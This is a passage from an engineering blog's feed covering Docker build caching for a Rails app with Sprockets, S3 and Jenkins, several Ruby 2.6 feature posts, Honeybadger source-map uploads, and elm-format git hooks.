public/assetsmanifest-15adda275d6505e4010b95819cf61eb3.jsonicons-6250335393ad03df1c67eafe138ab488.eoticons-6250335393ad03df1c67eafe138ab488.eot.gzcons-b341bf083c32f9e244d0dea28a763a63.svgcons-b341bf083c32f9e244d0dea28a763a63.svg.gzapplication-8988c56131fcecaf914b22f54359bf20.jsapplication-8988c56131fcecaf914b22f54359bf20.js.gzxlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.jsxlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js.gzapplication-adc697aed7731c864bafaa3319a075b1.cssapplication-adc697aed7731c864bafaa3319a075b1.css.gzFontAwesome-42b44fdc9088cae450b47f15fc34c801.otfFontAwesome-42b44fdc9088cae450b47f15fc34c801.otf.gz[...]</code></pre><p>We can see that the each source asset has been compiled and minified along withits gunzipped version.</p><p>Note that the assets have a unique and random digest or fingerprint in theirfile names. A digest is a hash calculated by Sprockets from the contents of anasset file. If the contents of an asset is changed, then that asset's digestalso changes. The digest is mainly used for busting cache so a new version ofthe same asset can be generated if the source file is modified or the configuredcache period is expired.</p><p>The <code>rake assets:precompile</code> task also generates a manifest file along with theprecompiled assets. This manifest is used by Sprockets to perform fast lookupswithout having to actually compile our assets code.</p><p>An example manifest file, in our case<code>public/assets/manifest-15adda275d6505e4010b95819cf61eb3.json</code> looks like this.</p><pre><code class="language-json">{  &quot;files&quot;: {    &quot;application-8988c56131fcecaf914b22f54359bf20.js&quot;: {      &quot;logical_path&quot;: &quot;application.js&quot;,      &quot;mtime&quot;: &quot;2018-07-06T07:32:27+00:00&quot;,      &quot;size&quot;: 3797752,      &quot;digest&quot;: &quot;8988c56131fcecaf914b22f54359bf20&quot;    },    &quot;xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js&quot;: {      &quot;logical_path&quot;: &quot;xlsx.full.min.js&quot;,      &quot;mtime&quot;: &quot;2018-07-05T22:06:17+00:00&quot;,      &quot;size&quot;: 883635,      &quot;digest&quot;: &quot;feaaf61b9d67aea9f122309f4e78d5a5&quot;    },    &quot;application-adc697aed7731c864bafaa3319a075b1.css&quot;: {      &quot;logical_path&quot;: &quot;application.css&quot;,      &quot;mtime&quot;: &quot;2018-07-06T07:33:12+00:00&quot;,      &quot;size&quot;: 242611,      &quot;digest&quot;: &quot;adc697aed7731c864bafaa3319a075b1&quot;    },    &quot;FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf&quot;: {      &quot;logical_path&quot;: &quot;FontAwesome.otf&quot;,      &quot;mtime&quot;: &quot;2018-06-20T06:51:49+00:00&quot;,      &quot;size&quot;: 134808,      &quot;digest&quot;: &quot;42b44fdc9088cae450b47f15fc34c801&quot;    },    [...]  },  &quot;assets&quot;: {    &quot;icons.eot&quot;: &quot;icons-6250335393ad03df1c67eafe138ab488.eot&quot;,    &quot;icons.svg&quot;: &quot;icons-b341bf083c32f9e244d0dea28a763a63.svg&quot;,    &quot;application.js&quot;: &quot;application-8988c56131fcecaf914b22f54359bf20.js&quot;,    &quot;xlsx.full.min.js&quot;: &quot;xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js&quot;,    &quot;application.css&quot;: &quot;application-adc697aed7731c864bafaa3319a075b1.css&quot;,    &quot;FontAwesome.otf&quot;: &quot;FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf&quot;,    [...]  }}</code></pre><p>Using this manifest file, Sprockets can quickly find a fingerprinted file nameusing that file's logical file name and vice versa.</p><p>Also, Sprockets generates cache in binary format at <code>tmp/cache/assets</code> in theRails application's folder for the specified Rails environment. Following is anexample tree structure of the <code>tmp/cache/assets</code> directory automaticallygenerated after executing <code>RAILS_ENV=environment_here rake assets:precompile</code>command for each Rails environment.</p><pre><code class="language-tree">$ cd tmp/cache/assets &amp;&amp; tree. demo  sass   7de35a15a8ab2f7e131a9a9b42f922a69327805d    application.css.sassc    bootstrap.css.sassc   [...]  sprockets      002a592d665d92efe998c44adc041bd3      7dd8829031d3067dcf26ffc05abd2bd5      [...] production  sass   80d56752e13dda1267c19f4685546798718ad433    application.css.sassc    bootstrap.css.sassc   [...]  sprockets      143f5a036c623fa60d73a44d8e5b31e7      31ae46e77932002ed3879baa6e195507      [...] staging   sass    2101b41985597d41f1e52b280a62cd0786f2ee51     application.css.sassc     bootstrap.css.sassc    [...]   sprockets       2c154d4604d873c6b7a95db6a7d5787a       3ae685d6f922c0e3acea4bbfde7e7466       [...]</code></pre><p>Let's inspect the contents of an example cached file. Since the cached file isin binary form, we can forcefully see the non-visible control characters as wellas the binary content in text form using <code>cat -v</code> command.</p><pre><code class="language-bash">$ cat -v tmp/cache/assets/staging/sprockets/2c154d4604d873c6b7a95db6a7d5787a^D^H{^QI&quot;class^F:^FETI&quot;^SProcessedAsset^F;^@FI&quot;^Qlogical_path^F;^@TI&quot;^]components/Comparator.js^F;^@TI&quot;^Mpathname^F;^@TI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@FI&quot;^Qcontent_type^F;^@TI&quot;^[application/javascript^F;^@TI&quot;mtime^F;^@Tl+^GM-gM-z;[I&quot;^Klength^F;^@Ti^BM-L^BI&quot;^Kdigest^F;^@TI&quot;%18138d01fe4c61bbbfeac6d856648ec9^F;^@FI&quot;^Ksource^F;^@TI&quot;^BM-L^Bvar Comparator = function (props) {  var comparatorOptions = [React.createElement(&quot;option&quot;, { key: &quot;?&quot;, value: &quot;?&quot; })];  var allComparators = props.metaData.comparators;  var fieldDataType = props.fieldDataType;  var allowedComparators = allComparators[fieldDataType] || allComparators.integer;  return React.createElement(    &quot;select&quot;,    {      id: &quot;comparator-&quot; + props.id,      disabled: props.disabled,      onChange: props.handleComparatorChange,      value: props.comparatorValue },    comparatorOptions.concat(allowedComparators.map(function (comparator, id) {      return React.createElement(        &quot;option&quot;,        { key: id, value: comparator },        comparator      );    }))  );};^F;^@TI&quot;^Vdependency_digest^F;^@TI&quot;%d6c86298311aa7996dd6b5389f45949f^F;^@FI&quot;^Srequired_paths^F;^@T[^FI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@FI&quot;^Udependency_paths^F;^@T[^F{^HI&quot;   path^F;^@TI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@F@^NI&quot;^^2018-07-03T22:38:31+00:00^F;^@T@^QI&quot;%51ab9ceec309501fc13051c173b0324f^F;^@FI&quot;^M_version^F;^@TI&quot;%30fd133466109a42c8cede9d119c3992^F;^@F</code></pre><p>We can see that there are some weird looking characters in the above filebecause it is not a regular file to be read by humans. Also, it seems to beholding some important information such as mime-type, original source code'spath, compiled source, digest, paths and digests of required dependencies, etc.Above compiled cache appears to be of the original source file located at<code>app/assets/javascripts/components/Comparator.jsx</code> having actual contents in JSXand ES6 syntax as shown below.</p><pre><code class="language-jsx">const Comparator = props =&gt; {  const comparatorOptions = [&lt;option key=&quot;?&quot; value=&quot;?&quot; /&gt;];  const allComparators = props.metaData.comparators;  const fieldDataType = props.fieldDataType;  const allowedComparators =    allComparators[fieldDataType] || allComparators.integer;  return (    &lt;select      id={`comparator-${props.id}`}      disabled={props.disabled}      onChange={props.handleComparatorChange}      value={props.comparatorValue}    &gt;      {comparatorOptions.concat(        allowedComparators.map((comparator, id) =&gt; (          &lt;option key={id} value={comparator}&gt;            {comparator}          &lt;/option&gt;        ))      )}    &lt;/select&gt;  );};</code></pre><p>If similar cache exists for a Rails environment under <code>tmp/cache/assets</code> and ifno source asset file is modified then re-running the <code>rake assets:precompile</code>task for the same environment will finish quickly. This is because Sprocketswill reuse the cache and therefore will need not to resolve the inter-assetsdependencies, perform conversion, etc.</p><p>Even if certain source assets are modified, Sprockets will rebuild the cache andre-generate compiled and fingerprinted assets just for the modified sourceassets.</p><p>Therefore, now we can understand that that if we can reuse the directories<code>tmp/cache/assets</code> and <code>public/assets</code> every time we need to execute<code>rake assets:precompile</code> task, then the Sprockets will perform precompilationmuch faster.</p><h2>Speeding up &quot;docker build&quot; -- first attempt</h2><p>As discussed above, we were now familiar about how to speed up the<code>bundle install</code> and <code>rake assets:precompile</code> commands individually.</p><p>We decided to use this knowledge to speed up our slow <code>docker build</code> command.Our initial thought was to mount a directory on the host Jenkins machine intothe filesystem of the image being built by the <code>docker build</code> command. Thismounted directory then can be used as a cache directory to persist the cachefiles of both <code>bundle install</code> and <code>rake assets:precompile</code> commands run as partof <code>docker build</code> command in each Jenkins build. Then every new build couldreuse the previous build's cache and therefore could finish faster.</p><p>Unfortunately, this wasn't possible due to no support from Docker yet. Unlikethe <code>docker run</code> command, we cannot mount a host directory into <code>docker build</code>command. A feature request for providing a shared host machine directory pathoption to the <code>docker build</code> command is still<a href="https://github.com/moby/moby/issues/14080#issuecomment-119371247">open here</a>.</p><p>To reuse cache and perform faster, we need to carry the cache files of both<code>bundle install</code> and <code>rake assets:precompile</code> commands between each<code>docker build</code> (therefore, Jenkins build). We were looking for some place whichcan be treated as a shared cache location and can be accessed during each build.</p><p>We decided to use Amazon's <a href="https://aws.amazon.com/s3/">S3 service</a> to solvethis problem.</p><p>To upload and download files from S3, we needed to inject credentials for S3into the build context provided to the <code>docker build</code> command.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/jenkins-configuration-to-inject-s3-credentials-in-docker-build.png" alt="Screenshot of Jenkins configuration to inject S3 credentials in docker build command"></p><p>Alternatively, these S3 credentials can be provided to the <code>docker build</code>command using <code>--build-arg</code> option as discussed earlier.</p><p>We used <code>s3cmd</code> command-line utility to interact with the S3 service.</p><p>Following shell script named as <code>install_gems_and_precompile_assets.sh</code> wasconfigured to be executed using a <code>RUN</code> instruction while running the<code>docker build</code> command.</p><pre><code class="language-bash">set -ex# Step 1.if [ -e s3cfg ]; then mv s3cfg ~/.s3cfg; fibundler_cache_path=&quot;vendor/cache&quot;assets_cache_path=&quot;tmp/assets/cache&quot;precompiled_assets_path=&quot;public/assets&quot;cache_archive_name=&quot;cache.tar.gz&quot;s3_bucket_path=&quot;s3://docker-builder-bundler-and-assets-cache&quot;s3_cache_archive_path=&quot;$s3_bucket_path/$cache_archive_name&quot;# Step 2.# Fetch tarball archive containing cache and extract it.# The &quot;tar&quot; command extracts the archive into &quot;vendor/cache&quot;,# &quot;tmp/assets/cache&quot; and &quot;public/assets&quot;.if s3cmd get $s3_cache_archive_path; then  tar -xzf $cache_archive_name &amp;&amp; rm -f $cache_archive_namefi# Step 3.# Install gems from &quot;vendor/cache&quot; and pack up them.bin/bundle install --without development test --path $bundler_cache_pathbin/bundle pack --quiet# Step 4.# Precompile assets.# Note that the &quot;RAILS_ENV&quot; is already defined in Dockerfile# and will be used implicitly.bin/rake assets:precompile# Step 5.# Compress &quot;vendor/cache&quot;, &quot;tmp/assets/cache&quot;# and &quot;public/assets&quot; directories into a tarball archive.tar -zcf $cache_archive_name $bundler_cache_path \                             $assets_cache_path  \                             $precompiled_assets_path# Step 6.# Push the compressed archive containing updated cache to S3.s3cmd put $cache_archive_name $s3_cache_archive_path || true# Step 7.rm -f $cache_archive_name ~/.s3cfg</code></pre><p>Let's discuss the various steps annotated in the above script.</p><ol><li>The S3 credentials file injected by Jenkins into the build context needs tobe placed at <code>~/.s3cfg</code> location, so we move that credentials fileaccordingly.</li><li>Try to fetch the compressed tarball archive comprising directories such as<code>vendor/cache</code>, <code>tmp/assets/cache</code> and <code>public/assets</code>. If exists, extractthe tarball archive at respective paths and remove that tarball.</li><li>Execute the <code>bundle install</code> command which would reuse the extracted cachefrom <code>vendor/cache</code>.</li><li>Execute the <code>rake assets:precompile</code> command which would reuse the extractedcache from <code>tmp/assets/cache</code> and <code>public/assets</code>.</li><li>Compress the cache directories <code>vendor/cache</code>, <code>tmp/assets/cache</code> and<code>public/assets</code> in a tarball archive.</li><li>Upload the compressed tarball archive containing updated cache directories toS3.</li><li>Remove the compressed tarball archive and the S3 credentials file.</li></ol><p>Please note that, in our actual case we had generated different tarball archivesdepending upon the provided <code>RAILS_ENV</code> environment. For demonstration, here weuse just a single archive instead.</p><p>The <code>Dockerfile</code> needed to update to execute the<code>install_gems_and_precompile_assets.sh</code> script.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latestENV APP_PATH /data/app/WORKDIR $APP_PATHADD . $APP_PATHARG RAILS_ENVRUN install_gems_and_precompile_assets.shCMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>With this setup, average time of the Jenkins builds was now reduced to about 5minutes. This was a great achievement for us.</p><p>We reviewed this approach in a great detail. We found that although the approachwas working fine, there was a major security flaw. It is not at all recommendedto inject confidential information such as login credentials, private keys, etc.as part of the build context or using build arguments while building a Dockerimage using <code>docker build</code> command. And we were actually injecting S3credentials into the Docker image. Such confidential credentials provided whilebuilding a Docker image can be inspected using <code>docker history</code> command byanyone who has access to that Docker image.</p><p>Due to above reason, we needed to abandon this approach and look for another.</p><h2>Speeding up &quot;docker build&quot; -- second attempt</h2><p>In our second attempt, we decided to execute <code>bundle install</code> and<code>rake assets:precompile</code> commands outside the <code>docker build</code> command. Outsidemeaning the place to execute these commands was Jenkins build itself. So withthe new approach, we had to first execute <code>bundle install</code> and<code>rake assets:precompile</code> commands as part of the Jenkins build and then execute<code>docker build</code> as usual. With this approach, we could now avail the inter-buildcaching benefits provided by Jenkins.</p><p>The prerequisite was to have all the necessary system packages installed on theJenkins machine required by the gems enlisted in the application's Gemfile. Weinstalled all the necessary system packages on our Jenkins server.</p><p>Following screenshot highlights the things that we needed to configure in ourJenkins job to make this approach work.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/jenkins-configuration-to-install-arbitrary-ruby-version-and-perform-caching.png" alt="Screenshot of Jenkins configuration highlighting installation of arbitrary Ruby version and maintaining cache and bundling gems and precompiling assets outside Docker build"></p><h4>1. Running the Jenkins build in RVM managed environment with the specified Ruby version</h4><p>Sometimes, we need to use different Ruby version as specified in the<code>.ruby-version</code> in the cloned source code of the application. By default, the<code>bundle install</code> command would install the gems for the system Ruby versionavailable on the Jenkins machine. This was not acceptable for us. Therefore, weneeded a way to execute the <code>bundle install</code> command in Jenkins build in anisolated environment which could use the Ruby version specified in the<code>.ruby-version</code> file instead of the default system Ruby version. To addressthis, we used <a href="https://wiki.jenkins.io/display/JENKINS/RVM+Plugin">RVM plugin</a>for Jenkins. The RVM plugin enabled us to run the Jenkins build in an isolatedenvironment by using or installing the Ruby version specified in the<code>.ruby-version</code> file. The section highlighted with green color in the abovescreenshot shows the configuration required to enable this plugin.</p><h4>2. Carrying cache files between Jenkins builds required to speed up &quot;bundle install&quot; and &quot;rake assets:precompile&quot; commands</h4><p>We used <a href="https://wiki.jenkins.io/display/JENKINS/Job+Cacher+Plugin">Job Cacher</a>Jenkins plugin to persist and carry the cache directories such as<code>vendor/cache</code>, <code>tmp/cache/assets</code> and <code>public/assets</code> between builds. At thebeginning of a Jenkins build just after cloning the source code of theapplication, the Job Cacher plugin restores the previously cached version ofthese directories into the current build. Similarly, before finishing a Jenkinsbuild, the Job Cacher plugin copies the current version of these directories at<code>/var/lib/jenkins/jobs/docker-builder/cache</code> on the Jenkins machine which isoutside the workspace directory of the Jenkins job. The section highlighted withred color in the above screenshot shows the necessary configuration required toenable this plugin.</p><h4>3. Executing the &quot;bundle install&quot; and &quot;rake assets:precompile&quot; commands before &quot;docker build&quot; command</h4><p>Using the &quot;Execute shell&quot; build step provided by Jenkins, we execute<code>bundle install</code> and <code>rake assets:precompile</code> commands just before the<code>docker build</code> command invoked by the CloudBees Docker Build and Publish plugin.Since the Job Cacher plugin already restores the version of <code>vendor/cache</code>,<code>tmp/cache/assets</code> and <code>public/assets</code> directories from the previous build intothe current build, the <code>bundle install</code> and <code>rake assets:precompile</code> commandsreuses the cache and performs faster.</p><p>The updated Dockerfile has lesser number of instructions now.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latestENV APP_PATH /data/app/WORKDIR $APP_PATHADD . $APP_PATHCMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>With this approach, average Jenkins build time is now between 3.5 to 4.5minutes.</p><p>Following graph shows the build time trend of some of the recent builds on ourJenkins server.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/build-time-trend-after-speedup-tweaks.png" alt="Screenshot of build time trend graph after speedup tweaks"></p><p>Please note that the spikes in the above graphs shows that certain Jenkinsbuilds took more than 5 minutes sometimes due to concurrently running builds atthat time. Because our Jenkins server has a limited set of resources,concurrently running builds often run longer than estimated.</p><p>We are still looking to improve the containerization speed even more and stillmaintaining the image size small. Please let us know if there's anything else wecan do to improve the containerization process.</p><p>Note that that our Jenkins server runs on the Ubuntu OS which is based onDebian. Our base Docker image is also based on Debian. Some of the gems in ourGemfile are native extensions written in C. The pre-installed gems on Jenkinsmachine have been working without any issues while running inside the Dockercontainers on Kubernetes. It may not work if both of the platforms are differentsince native extension gems installed on Jenkins host may fail to work insidethe Docker container.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Binding#source_location]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-binding-source-location"/>
      <updated>2018-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-binding-source-location</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we want to know file name with location and line number ofsource code, we would need to use Binding#eval (Link is not available) .</p><pre><code class="language-ruby">binding.eval('[__FILE__, __LINE__]')=&gt; [&quot;/Users/taha/blog/app/controllers/application_controller&quot;, 2]</code></pre><p>Ruby 2.6 adds more readable method Binding#source_location (Link is notavailable) to achieve similar result.</p><pre><code class="language-ruby">binding.source_location=&gt; [&quot;/Users/taha/blog/app/controllers/application_controller&quot;, 2]</code></pre><p>Here is relevant <a href="https://github.com/ruby/ruby/commit/571e48">commit</a> and<a href="https://bugs.ruby-lang.org/issues/14230">discussion</a> for this change.</p><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-binding-dui-xiang-zeng-jia-source_location-fang-fa/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds String#split with block]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-split-with-block"/>
      <updated>2018-07-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-split-with-block</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6,<a href="http://ruby-doc.org/core-2.5.1/String.html#method-i-split">String#split</a>returned array of split strings.</p><p>In Ruby 2.6, a block can be passed to String#split (Link is not available) whichyields each split string and operates on it. This avoids creating an array andthus is memory efficient.</p><p>We will add method <code>is_fruit?</code> to understand how to use <code>split</code> with a block.</p><pre><code class="language-ruby">def is_fruit?(value)%w(apple mango banana watermelon grapes guava lychee).include?(value)end</code></pre><p>Input is a comma separated string with vegetables and fruits names. Goal is tofetch names of fruits from input string and store it in an array.</p><h5>String#split</h5><pre><code class="language-ruby">input_str = &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;splitted_values = input_str.split(&quot;, &quot;)=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;potato&quot;, &quot;banana&quot;, &quot;cabbage&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]fruits = splitted_values.select { |value| is_fruit?(value) }=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;banana&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]</code></pre><p>Using <code>split</code> an intermediate array is created which contains both fruits andvegetables names.</p><h5>String#split with a block</h5><pre><code class="language-ruby">fruits = []input_str = &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;input_str.split(&quot;, &quot;) { |value| fruits &lt;&lt; value if is_fruit?(value) }=&gt; &quot;apple, mango, potato, banana, cabbage, watermelon, grapes&quot;fruits=&gt; [&quot;apple&quot;, &quot;mango&quot;, &quot;banana&quot;, &quot;watermelon&quot;, &quot;grapes&quot;]</code></pre><p>When a block is passed to <code>split</code>, it returns the string on which split wascalled and does not create an array. <code>String#split</code> yields block on each splitstring, which in our case was to push fruit names in a separate array.</p><h4>Update</h4><h5>Benchmark</h5><p>We created a large random string to benchmark performance of <code>split</code> and<code>split with block</code></p><pre><code class="language-ruby">require 'securerandom'test_string = ''100_000.times.each dotest_string += SecureRandom.alphanumeric(10)test_string += ' 'end</code></pre><pre><code class="language-ruby">require 'benchmark'Benchmark.bmbm do |bench|bench.report('split') doarr = test_string.split(' ')str_starts_with_a = arr.select { |str| str.start_with?('a') }endbench.report('split with block') dostr_starts_with_a = []test_string.split(' ') { |str| str_starts_with_a &lt;&lt; str if str.start_with?('a') }endend</code></pre><p>Results</p><pre><code class="language-plaintext">Rehearsal ----------------------------------------------------split              0.023764   0.000911   0.024675 (  0.024686)split with block   0.012892   0.000553   0.013445 (  0.013486)------------------------------------------- total: 0.038120sec                       user     system      total        realsplit              0.024107   0.000487   0.024594 (  0.024622)split with block   0.010613   0.000334   0.010947 (  0.010991)</code></pre><p>We did another iteration of benchmarking using<a href="https://github.com/evanphx/benchmark-ips">benchmark/ips</a>.</p><pre><code class="language-ruby">require 'benchmark/ips'Benchmark.ips do |bench|bench.report('split') dosplitted_arr = test_string.split(' ')str_starts_with_a = splitted_arr.select { |str| str.start_with?('a') }endbench.report('split with block') dostr_starts_with_a = []test_string.split(' ') { |str| str_starts_with_a &lt;&lt; str if str.start_with?('a') }endbench.compare!end</code></pre><p>Results</p><pre><code class="language-plaintext">Warming up --------------------------------------               split     4.000  i/100ms    split with block    10.000  i/100msCalculating -------------------------------------               split     46.906  ( 2.1%) i/s -    236.000  in   5.033343s    split with block    107.301  ( 1.9%) i/s -    540.000  in   5.033614sComparison:    split with block:      107.3 i/s               split:       46.9 i/s - 2.29x  slower</code></pre><p>This benchmark shows that <code>split with block</code> is about 2 times faster than<code>split</code>.</p><p>Here is relevant<a href="https://github.com/ruby/ruby/commit/2258a97fe2b21da9ec294ccedd00b3bbbc85cb07">commit</a>and <a href="https://bugs.ruby-lang.org/issues/4780">discussion</a> for this change.</p><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-stringde-split-fang-fa-zhi-chi-dai-ma-kuai-zhi-xing/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to upload source maps to Honeybadger]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-upload-source-maps-to-honeybadger"/>
      <updated>2018-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-upload-source-maps-to-honeybadger</id>
      <content type="html"><![CDATA[<p>During the development of a chrome extension, debugging was difficult becauseline number of minified JavaScript file is of no use without a source map.Previously, Honeybadger could only download the source map files which werepublic and our source maps were inside the <code>.crx</code> package which was inaccessibleto honeybadger.</p><p>Recently, Honeybadger released a new<a href="http://blog.honeybadger.io/source-map-upload/">feature</a> to upload the sourcemaps to Honeybadger. We have written a grunt plugin to upload the source maps toHoneybadger.</p><p>Here is how we can upload source map to Honeybadger.</p><p>First, install the grunt plugin.</p><pre><code class="language-bash">npm install --save-dev grunt-honeybadger-sourcemaps</code></pre><p>Configure the gruntfile.</p><pre><code class="language-javascript">grunt.initConfig({  honeybadger_sourcemaps: {    default_options:{      options: {        appId: &quot;xxxx&quot;,        token: &quot;xxxxxxxxxxxxxx&quot;,        urlPrefix: &quot;http://example.com/&quot;,        revision: &quot;&lt;app version&gt;&quot;        prepareUrlParam: function(fileSrc){          // Here we can manipulate the filePath          return filesrc.replace('built/', '');        },      },      files: [{        src: ['@path/to/**/*.map']      }],    }  },});grunt.loadNpmTasks('grunt-honeybadger-sourcemaps');grunt.registerTask('upload_sourcemaps', ['honeybadger_sourcemaps']);</code></pre><pre><code class="language-plaintext">We can get the `appId` and `token` from Honeybadger project settings.~~~plaintextgrunt upload_sourcemaps</code></pre><p>Now, we can upload the source maps to Honeybadger and get better error stacktrace.</p><h2>Testing</h2><p>Clone the following repo.</p><pre><code class="language-bash">git clone https://github.com/bigbinary/grunt-honeybadger-sourcemaps</code></pre><p>Replace <code>appId</code> and <code>token</code> in Gruntfile.js and run <code>grunt test</code>. It shouldupload the sample source maps to your project.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 raises exception for else without rescue]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.6-raise-exception-for-else-without-rescue"/>
      <updated>2018-07-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.6-raise-exception-for-else-without-rescue</id>
      <content type="html"><![CDATA[<h4>Ruby 2.5</h4><p>If we use <code>else</code> without <code>rescue</code> inside <code>begin..end</code> block in Ruby 2.5, itgives a warning.</p><pre><code class="language-ruby">irb(main):001:0&gt; beginirb(main):002:1&gt; puts &quot;Inside begin block&quot;irb(main):003:1&gt; elseirb(main):004:1&gt; puts &quot;Inside else block&quot;irb(main):005:1&gt; end(irb):5: warning: else without rescue is useless</code></pre><p>This warning is present as code inside <code>else</code> block will never get executed</p><h4>Ruby 2.6</h4><p>In Ruby 2.6 it will raise an exception if we use <code>else</code> without <code>rescue</code> in<code>begin..end</code> block. This<a href="https://github.com/ruby/ruby/commit/140512d2225e6fd046ba1bdbcd1a27450f55c233#diff-ff4e2dc4962dc25a1512353299992c8d">commit</a>changed warning into exception in Ruby 2.6. Changes made in the commit areexperimental.</p><pre><code class="language-ruby">irb(main):001:0&gt; beginirb(main):002:1&gt; puts &quot;Inside begin block&quot;irb(main):003:1&gt; elseirb(main):004:1&gt; puts &quot;Inside else block&quot;irb(main):005:1&gt; endTraceback (most recent call last):1: from /usr/local/bin/irb:11:in `&lt;main&gt;'SyntaxError ((irb):3: else without rescue is useless)</code></pre><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-hui-zai-begin-end-dai-ma-kuai-zhong-yin-wei-bu-xie-rescue-zhi-xie-else-er-pao-chu-yi-chang-shi-yan-xing-feature">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Auto-format Elm code with elm-format before commit]]></title>
       <author><name>Ritesh Pillai</name></author>
      <link href="https://www.bigbinary.com/blog/format-your-elm-code-with-elm-format-before-committing"/>
      <updated>2018-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/format-your-elm-code-with-elm-format-before-committing</id>
      <content type="html"><![CDATA[<p>In one of our earlier posts<a href="https://blog.bigbinary.com/2017/06/12/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files.html">we talked about</a>how we set up <a href="https://github.com/prettier/prettier">prettier</a> and<a href="https://github.com/bbatsov/rubocop">rubocop</a> to automatically format ourJavaScript and Ruby code on git commit.</p><p>Recently we started working with Elm in a couple of our projects -<a href="https://github.com/bigbinary/apisnapshot">APISnapshot</a> and<a href="https://github.com/bigbinary/acehelp">AceHelp</a>.</p><p>Tools like prettier and rubocop have really helped us take a load off our mindwith regards to formatting code. And one of the very first things we wanted tosort out when we started doing Elm was pretty printing our Elm code.</p><p><a href="https://github.com/avh4/elm-format">elm-format</a> created by<a href="https://github.com/avh4">Aaron VonderHaar</a> formats Elm source code according toa standard set of rules based on the official<a href="http://elm-lang.org/docs/style-guide">Elm Style Guide</a>.</p><h2>Automatic code formatting</h2><p>Let's setup git hook to automatically take care of code formatting. We canachieve this much like how we did it in our previous<a href="https://blog.bigbinary.com/2017/06/12/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files.html">post</a>,using <a href="https://github.com/typicode/husky/tree/v0.14.3">Husky</a> and<a href="https://github.com/okonet/lint-staged">Lint-staged</a>.</p><p>Let's add Husky and lint-staged as dev dependencies to our project. And forcompleteness also include elm-format as a dev dependency.</p><pre><code class="language-javascript">npm install --save-dev husky lint-staged elm-format</code></pre><p>Husky makes it real easy to create git hooks. Git hooks are scripts that areexecuted by git before or after an event. We will be using the <code>pre-commit</code> hookwhich is run after you do a <code>git commit</code> command but before you type in a commitmessage.</p><p>This way we can change and format files that's about to be committed by runningelm-format using Husky.</p><p>But there is one problem here. The changed files do not get added back to ourcommit.</p><p>This is where Lint-staged comes in. Lint-staged is built to run linters onstaged files. So instead of running elm-format on a pre-commit hook we would runlint-staged. And we can configure lint-staged such that elm-format is run on allstaged elm files.</p><p>We can also include Prettier to take care of all staged JavaScript files too.</p><p>Lets do this by editing our <code>package.json</code> file.</p><pre><code class="language-json">{  &quot;scripts&quot;: {    &quot;precommit&quot;: &quot;lint-staged&quot;  },  &quot;lint-staged&quot;: {    &quot;*.elm&quot;: [&quot;elm-format --yes&quot;, &quot;git add&quot;],    &quot;*.js&quot;: [&quot;prettier --write&quot;, &quot;git add&quot;]  }}</code></pre><p>All set and done!</p><p>Now whenever we do a <code>git commit</code> command, all our staged elm and JavaScriptfiles will get properly formatted before the commit goes in.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds endless range]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-endless-range"/>
      <updated>2018-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-endless-range</id>
